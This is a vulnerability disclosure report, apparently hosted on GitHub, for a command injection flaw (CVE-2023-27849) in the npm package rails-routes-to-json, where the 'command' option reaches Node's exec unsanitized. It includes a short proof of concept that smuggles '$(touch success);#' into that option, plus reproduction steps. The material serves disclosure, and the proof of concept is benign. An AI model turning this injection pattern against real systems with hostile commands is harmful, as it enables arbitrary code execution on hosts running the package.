CVE-2023-27849: Vulnerability-Reports/report.md at 2211ea4712f24d20b7f223fb737910fdfb041edb · omnitaint/Vulnerability-Reports

Permalink

Cannot retrieve contributors at this time

Vulnerability in rails-routes-to-json

This report details an ACI vulnerability affecting [email protected].

Package source

• https://www.npmjs.com/rails-routes-to-json

Vulnerability Overview

Affected versions of this package are vulnerable to arbitrary command injection (CWE-77 [1]).

If (attacker-controlled) user input is given to the “command” key of the “options” argument of the package constructor, it is possible for an attacker to execute arbitrary commands on the operating system that this package is being run on.

This vulnerability is due to use of the child_process exec function without input sanitization. The Node.js API documentation states that unsanitized user input should never be passed to exec [2].

[1] https://cwe.mitre.org/data/definitions/77.html

[2] https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback

Reproduction

To exploit this vulnerability, another package must include “rails-routes-to-json” as a dependency and pass user-controlled input to the “command” option of "rails-routes-to-json".

The proof-of-concept (PoC) program below illustrates the issue. Executing this code will cause the command touch success to be executed, leading to the creation of a file called success.

var PUT = require(‘rails-routes-to-json’); var x = "$(touch success);#"; try { new PUT({’command’: x}, function(x) {}); } catch (e) { console.log(e); }

Steps to reproduce:

1. npm i [email protected]
2. Create a file, e.g., poc0.js, containing the PoC code.
3. Execute the file: node poc0.js